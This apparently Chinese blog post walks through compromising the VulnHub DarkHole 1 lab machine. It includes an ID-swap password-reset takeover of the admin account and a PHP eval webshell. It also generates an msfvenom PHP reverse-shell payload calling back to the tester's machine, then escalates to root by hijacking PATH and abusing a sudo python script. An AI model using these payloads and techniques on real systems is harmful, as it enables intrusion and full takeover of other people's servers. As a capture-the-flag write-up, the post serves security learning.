darkhole1

最新推荐文章于 2024-08-12 19:37:45 发布
最新推荐文章于 2024-08-12 19:37:45 发布
阅读量40 收藏
点赞数
文章标签: php linux 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47078547/article/details/131210330
版权 
https://www.vulnhub.com

测试机系统:kali、靶机

测试机IP:192.168.3.142

kali:192.168.3.136

一、信息收集

1.主机发现

arp-scan -l

发现靶机IP:192.168.3.142

2.端口扫描 服务扫描

nmap -T4 -sV -O 192.168.3.142

3.目录扫描

dirp http://192.168.3.142

5.访问目录扫描出的网站

访问http://192.168.3.142/login.php

二、漏洞探测

拿到这么一个网站,暂时没有多余的线索,只有个登录页面:

注册账号

暴力破解不太现实,可以尝试一下注册个账号:

登陆进来没发现可以上传文件的地方,倒是发现了重置密码的地方

我们尝试重置下密码,并f12看下网络流量

这里使用bp 抓包

将id=2改成id=1

发送成功

我们试下99.99%开发都会创建的管理员用户名admin,并用刚刚重置的密码登陆下

试着上传个正常的文件试试看

上传成功

在上传一句话木马

<?php @eval($_POST[cmd]);?)>

访问一下

三、漏洞利用

生成php反弹shell脚本:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.128 lpor=4444 -o msfshell.php

上传木马

 kali端开启msf监听
 开启msf,使用模块,设置参数和载荷:

use exploit/multi/handler
set lhost 192.168.3.136
set lport 4444
set payload php/meterpreter/reverse_tcp

四、提权

查看敏感文件之后发现有两个用户:

cat /etc/passwd | grep /bin/bash

/home/john/toto可以用来提权,尝试执行下

www-data@darkhole:/$ /home/john/toto
/home/john/toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
www-data@darkhole:/$
看样子应该是以john用户权限执行了id命令
我们来做个恶意的PATH环境看看能不能获取john用户的权限

www-data@darkhole:/$ cd /tmp
cd /tmp
www-data@darkhole:/tmp$ echo "/bin/bash" > id
echo "/bin/bash" > id
www-data@darkhole:/tmp$ chmod a+x id
chmod a+x id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@darkhole:/tmp$
执行/home/john/toto

www-data@darkhole:/tmp$ /home/john/toto
/home/john/toto
john@darkhole:/tmp$ whoami
whoami
john
john@darkhole:/tmp$

# 看下user.txt
john@darkhole:/home/john$ cat user.txt
cat user.txt
DarkHole{You_Can_DO_It}
john@darkhole:/home/john$

# 看下password
john@darkhole:/home/john$ cat password
cat password
root123
john@darkhole:/home/john$
# 看下当前用户可以用sudo执行啥命令

john@darkhole:/home/john$ sudo -l
sudo -l
[sudo] password for john: root123

Matching Defaults entries for john on darkhole:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on darkhole:
    (root) /usr/bin/python3 /home/john/file.py
john@darkhole:/home/john$

# 看样子是以root权限执行了/usr/bin/python3 /home/john/file.py
# 那我们在 /home/john/file.py中写入python代码尝试获取shell环境
john@darkhole:/home/john$ echo "import pty;pty.spawn('/bin/bash')" > /home/john/file.py
"import pty;pty.spawn('/bin/bash')" > /home/john/file.py
john@darkhole:/home/john$ sudo /usr/bin/python3 /home/john/file.py
sudo /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# whoami
whoami
root
root@darkhole:/home/john#

Romantic Never Die
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶场-DarkHole1
weixin_58602402的博客
06-16 320
修改密码进行抓包,发现有个id值,在sql注入输入id为1时返回无权访问,猜测id值代表用户,构造payload修改其它用户的密码。4.切换回到/home/john 文件夹,再次执行./toto,就会启动一个 bash,这个 bash 就会切换 shell。2.发现/home/john/toto,切换到这个位置去执行,返回不同的id。开始进行绕过,直接将后缀改为jpg成功上传,同时找到文件上传的位置。2.通过蚁剑将木马上传,kali开启监听等待上线,反弹失败。7.发现个文件上传,尝试上传发现具有限制。
DarkHole1 vulnhub靶场
weixin_62621015的博客
03-14 164
DarkHole1 vulnhub靶场个人通关笔记
darkhole1靶场
zjxxxy的博客
06-14 117
vulnhub靶场darkhole1攻略
darkhole1靶场渗透通关
tpaer的博客
10-02 946
记录下靶场实战的通关过程。主要通关流程是利用web页面的逻辑漏洞进行越权,再绕过文件上传黑名单上传木马getshell,最后通过本地环境变量进行提权。只是一种思路,也可以用一些其他通杀漏洞(CVE-2021-4034)来打。
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 546
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
DarkHole1打靶记录
wwd180的博客
06-15 102
实验主机:攻击机kali(192.168.109.131)靶机DarkHole(192.168.109.132)实验目标:获取root权限 + flag实验网络:NAT。
靶场练习 NO.26 DarkHole1 任意账号重置登录管理员账号,phtml特殊后缀解析上传成功,pkexec提权或者修改环境变量伪造id命令为bash+sudo
YouthBelief的博客
03-08 809
DarkHole10x00 环境准备0x01 信息收集步骤一: ip探测步骤二:端口服务识别0x02 漏洞探测步骤一:80端口探测步骤二:注册后登录后台测漏洞步骤三:测试上述漏洞任意账号密码重置步骤四:登录id为1的账号(应该为管理员)步骤五:上传php木马(失败,黑名单)(1)上传php尝试(2)上传.txt .aaa尝试步骤六:尝试黑名单绕过(1)确定信息(2)尝试apache多后缀解析(失败)(3)尝试.htaccess(失败)(4) PHP大写绕过(上传成功,不解析)(5)php其余后缀(phtml
vulnhub靶场——DarkHole 1
Czheisenberg的博客
02-17 3744
vulnhub靶场——DarkHole 1 WriteUp
VulnHub—DarkHole_ 1
2301_76786857的博客
07-09 176
靶机IP:192.168.245.143测试机系统:kali、win10测试机IP:192.168.245.139。
LNMP环境搭建论坛
qq_63652578的博客
08-07 999
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 291
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
【信创】Linux系统如何使用命令行或图形化工具禁用ipv6 _ 统信 _ 麒麟 _ 中科方德
鹏大圣运维
08-09 1050
Hello,大家好啊,今天给大家带来一篇关于在Linux系统中如何使用命令行或Grub Customizer工具禁用IPv6的文章。IPv6在某些环境下可能会引起网络问题或不必要的复杂性,因此禁用它可能会提高系统的稳定性和性能。本文将详细介绍两种禁用IPv6的方法。欢迎大家分享转发,点个关注和在看吧!
PHP图书借阅微信小程序系统源码
2401_84414018的博客
08-12 85
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1454
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
ctfhub文件包含
a666666688的博客
08-07 573
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
贷齐乐系统sql注入漏洞
banliyaoguai的博客
08-12 301
然后在这里取值的时候.和_会区分开,然后我们可以在第一个i_d写我们的payload,在i.d写正常数据用来绕过waf。可以使用使用php小特性和全局污染绕过,在这里的时候会将.转换成下划线,然后桡骨第一个waf。这里由于等号被过滤乐所以使用like,然后查表名的时候由于'被过滤所以使用了16进制编码。首先php在遇到两个相同名字参数时,php是取后一个的,如下图最终i_d的值为1。代码先走这里将输入的数据进行过滤。然后再继续往下走,再进行一个查询。然后继续往下,用=进行分割。
代码随想录算法训练营Day35 | 01背包问题 | 416. 分割等和子集
wonderlandlja的博客
08-10 226
【代码】代码随想录算法训练营Day35 | 01背包问题 | 416. 分割等和子集。
ThinkPHP5.0.15漏洞解析及SQL注入
m0_70638961的博客
08-11 194
通过查看5.0.15和5.0.16版本的对比,可以看到16版本对在Builder.php里面对数据库的增减做了修正,所以可以15版本的漏洞就存在在这里。这里的代码用的拼接的方式,就可以尝试使用报错注入来实现。到了这里就发现,我们注入的三个值在这里派上了用场,val[1]就是注入的报错语句,这里走完,返回的就是报错注入语句+1,接下来我们继续走,一直走到这里。为了清楚代码是怎么走的,我们可以在insert()打一个断点,重新提交后就可以进入断点了,这里我们可以看到username有三个值。
解决域名加别名后再代理或者映射到fastadmin项目
最新发布
weixin_51957364的博客
08-12 107
如果遇到微应用不想再添加或者不方便添加单独的二级域名时,就需要用到代理或者映射来进入到我们的微应用项目中。然后再修改config.php文件里面的view_replace_str参数,添加你的域名加别名就可以了。可以修改route.php路由文件的下面这个参数。最后记得一定要再后台一键清理缓存!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值